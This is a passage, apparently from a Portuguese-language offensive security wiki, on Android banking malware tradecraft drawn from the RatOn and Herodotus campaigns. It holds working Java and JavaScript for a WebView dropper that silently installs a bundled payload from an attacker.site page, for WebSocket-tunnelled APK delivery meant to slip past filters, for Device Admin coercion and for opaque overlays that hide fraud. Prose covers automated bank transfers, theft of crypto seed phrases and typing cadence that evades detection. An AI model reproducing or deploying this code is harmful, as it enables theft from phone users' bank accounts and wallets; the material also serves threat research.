// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Por que isso evade controles simples:
- Nenhum URL estático de APK é exposto; o payload é reconstruído na memória a partir de frames WebSocket.
- Filtros de URL/MIME/extensão que bloqueiam respostas .apk diretas podem deixar passar dados binários tunelados via WebSockets/Socket.IO.
- Crawlers e URL sandboxes que não executam WebSockets não recuperarão o payload.

Veja também WebSocket tradecraft and tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay e abuso de Device Admin, automação de ATS e orquestração de NFC relay – estudo de caso RatOn

A campanha RatOn banker/RAT (ThreatFabric) é um exemplo concreto de como operações modernas de phishing móvel combinam WebView droppers, automação de UI guiada por Accessibility, overlays/ransom, coerção via Device Admin, Automated Transfer System (ATS), tomada de controle de carteiras crypto e até orquestração de NFC-relay. Esta seção abstrai as técnicas reutilizáveis.

### Stage-1: WebView → ponte de instalação nativa (dropper)
Os atacantes exibem um WebView apontando para uma página maliciosa e injetam uma interface JavaScript que expõe um instalador nativo. Um toque em um botão HTML chama o código nativo que instala um APK de segunda fase empacotado nos assets do dropper e, em seguida, o executa diretamente.

Padrão mínimo:

<details>
<summary>Padrão mínimo do dropper Stage-1 (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

HTML na página:

<button onclick="bridge.installApk()">Install</button>

Após a instalação, o dropper inicia o payload via package/activity explícito:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Ideia de hunting: apps não confiáveis chamando addJavascriptInterface() e expondo métodos do tipo installer ao WebView; APK que inclui um payload secundário embutido em assets/ e invoca o Package Installer Session API.

Funil de consentimento: Accessibility + Device Admin + prompts de runtime subsequentes

Stage-2 abre um WebView que hospeda uma página “Access”. Seu botão invoca um exported method que navega a vítima para as configurações de Accessibility e solicita a ativação do serviço malicioso. Uma vez concedida, o malware usa Accessibility para clicar automaticamente através dos diálogos de permissão de runtime subsequentes (contacts, overlay, manage system settings, etc.) e solicita Device Admin.

• Accessibility ajuda programaticamente a aceitar prompts posteriores encontrando botões como “Allow”/“OK” na árvore de nós e disparando cliques.
• Verificação/solicitação da permissão overlay:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

See also:

Accessibility Services Abuse

Phishing por sobreposição / extorsão via WebView

Operadores podem emitir comandos para:

• renderizar uma sobreposição em tela cheia a partir de uma URL, ou
• passar HTML inline que é carregado em uma sobreposição WebView.

Usos prováveis: coerção (entrada do PIN), abertura de wallet para capturar PINs, mensagens de extorsão. Mantenha um comando para garantir que a permissão de sobreposição esteja concedida caso esteja faltando.

Modelo de controle remoto – pseudo-tela de texto + screen-cast

• Baixa largura de banda: periodicamente fazer dump da Accessibility node tree, serializar textos visíveis/roles/bounds e enviar ao C2 como uma pseudo-tela (comandos como txt_screen uma vez e screen_live contínuo).
• Alta fidelidade: solicitar MediaProjection e iniciar screen-casting/gravação sob demanda (comandos como display / record).

Playbook ATS (automação de app bancário)

Dada uma tarefa em JSON, abrir o app bancário, controlar a UI via Accessibility com uma mistura de consultas por texto e toques por coordenadas, e inserir o PIN de pagamento da vítima quando solicitado.

Exemplo de tarefa:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Exemplos de textos vistos em um fluxo alvo (CZ → EN):

• “Nová platba” → “Novo pagamento”
• “Zadat platbu” → “Inserir pagamento”
• “Nový příjemce” → “Novo destinatário”
• “Domácí číslo účtu” → “Número de conta doméstica”
• “Další” → “Próximo”
• “Odeslat” → “Enviar”
• “Ano, pokračovat” → “Sim, continuar”
• “Zaplatit” → “Pagar”
• “Hotovo” → “Concluído”

Operadores também podem verificar/aumentar limites de transferência via comandos como check_limit e limit que navegam pela interface de limites de forma semelhante.

Extração da seed de carteiras Crypto

Alvos como MetaMask, Trust Wallet, Blockchain.com, Phantom. Fluxo: unlock (stolen PIN or provided password), navigate to Security/Recovery, reveal/show seed phrase, keylog/exfiltrate it. Implemente seletores sensíveis à localidade (EN/RU/CZ/SK) para estabilizar a navegação entre idiomas.

Coerção do Device Admin

As Device Admin APIs são usadas para aumentar as oportunidades de captura do PIN e frustrar a vítima:

• Bloqueio imediato:

dpm.lockNow();

• Expirar a credencial atual para forçar a alteração (Accessibility captura o novo PIN/senha):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Forçar desbloqueio não biométrico desativando recursos biométricos do keyguard:

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Nota: Muitos controles do DevicePolicyManager exigem Device Owner/Profile Owner em versões recentes do Android; alguns builds de OEM podem ser mais permissivos. Sempre valide no OS/OEM alvo.

Orquestração de relay NFC (NFSkate)

Stage-3 pode instalar e iniciar um módulo externo de NFC-relay (por ex., NFSkate) e até fornecer um template HTML para guiar a vítima durante o relay. Isso possibilita cash-out contactless com card-present, juntamente com ATS online.

Referência: NFSkate NFC relay.

Conjunto de comandos do operador (exemplo)

• UI/estado: txt_screen, screen_live, display, record
• Redes sociais: send_push, Facebook, WhatsApp
• Sobreposições: overlay (inline HTML), block (URL), block_off, access_tint
• Carteiras: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Dispositivo: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Comms/Recon: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Anti-detecção ATS orientado por Accessibility: cadência de texto similar à humana e injeção dual de texto (Herodotus)

Atores de ameaça cada vez mais misturam automação orientada por Accessibility com anti-detecção afinada contra biometria comportamental básica. Um banker/RAT recente mostra dois modos complementares de entrega de texto e um toggle do operador para simular digitação humana com cadência randomizada.

• Modo de descoberta: enumerar nodes visíveis com selectors e bounds para direcionar precisamente inputs (ID, text, contentDescription, hint, bounds) antes de agir.
• Injeção dual de texto:
• Modo 1 – ACTION_SET_TEXT diretamente no node alvo (estável, sem teclado);
• Modo 2 – clipboard set + ACTION_PASTE no node com foco (funciona quando setText direto está bloqueado).
• Cadência similar à humana: dividir a string fornecida pelo operador e entregá-la caractere a caractere com delays randomizados de 300–3000 ms entre eventos para evadir heurísticas de “digitação em velocidade de máquina”. Implementado ou por crescimento progressivo do valor via ACTION_SET_TEXT, ou colando um caractere por vez.

</details>

Overlays de bloqueio para encobrir fraudes:
- Renderize um `TYPE_ACCESSIBILITY_OVERLAY` em tela cheia com opacidade controlada pelo operador; mantenha-o opaco para a vítima enquanto a automação remota prossegue por baixo.
- Comandos normalmente expostos: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Overlay mínimo com alpha ajustável:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);